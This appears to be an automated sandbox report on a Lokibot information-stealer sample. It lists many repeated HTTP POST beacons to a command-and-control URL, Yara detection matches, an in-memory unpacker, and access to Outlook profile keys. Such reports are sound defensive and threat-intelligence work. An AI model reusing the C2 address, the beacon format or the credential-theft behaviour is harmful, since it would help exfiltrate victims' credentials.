                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_00404ED4 recv,1_2_00404ED4
                    Source: unknownDNS traffic detected: queries for: nevomw.com
                    Source: unknown HTTP traffic detected: POST /candy/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: nevomw.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1D39DE6 Content-Length: 196 Connection: close
                    Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 02 Dec 2020 10:52:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/7.4.10RC1 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.607462942.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: http://nevomw.com/candy/five/fre.php
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comai
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comce9
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comuec
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

                    System Summary:

                    Malicious sample detected (through community Yara rule)
                    Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                    Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_017BC1340_2_017BC134
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_017BE5780_2_017BE578
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_017BE56A0_2_017BE56A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC4BA20_2_07AC4BA2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC5F280_2_07AC5F28
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC5F380_2_07AC5F38
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC10C70_2_07AC10C7
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC10D80_2_07AC10D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_0040549C1_2_0040549C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_004029D41_2_004029D4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: String function: 0041219C appears 45 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: String function: 00405B6F appears 42 times
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000000.341178882.0000000000F66000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamed~ vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.369734521.0000000007840000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_rc.dllT vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.369816224.00000000078F0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000000.360680580.0000000000986000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamed~ vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeBinary or memory string: OriginalFilenamed~ vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@3/3@247/2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Code function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Code function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,1_2_0040434D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.log
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, File read: C:\Windows\System32\drivers\etc\hosts
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Virustotal: Detection: 39%
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, ReversingLabs: Detection: 20%
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, String found in binary or memory: "/Added title with ID {0}-Deleted title with ID +Loaded title with ID GCould not find title with entry {0}
                    Source: unknown, Process created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe'
                    Source: unknown, Process created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe {path}
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Process created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe {path}
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation:

                    .NET source code contains potential unpacker
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, StoreManagmentSystem/FormStart.cs, .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.ec0000.0.unpack, StoreManagmentSystem/FormStart.cs, .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.ec0000.0.unpack, StoreManagmentSystem/FormStart.cs, .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.8e0000.1.unpack, StoreManagmentSystem/FormStart.cs, .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.0.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.8e0000.0.unpack, StoreManagmentSystem/FormStart.cs, .Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Binary contains a suspicious time stamp
                    Source: initial sample, Static PE information: 0xC1FEB99E [Sun Feb 19 02:19:10 2073 UTC]
                    Yara detected aPLib compressed binary
                    Source: Yara match, File source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 7108, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 4852, type: MEMORY
                    Source: Yara match, File source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Code function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
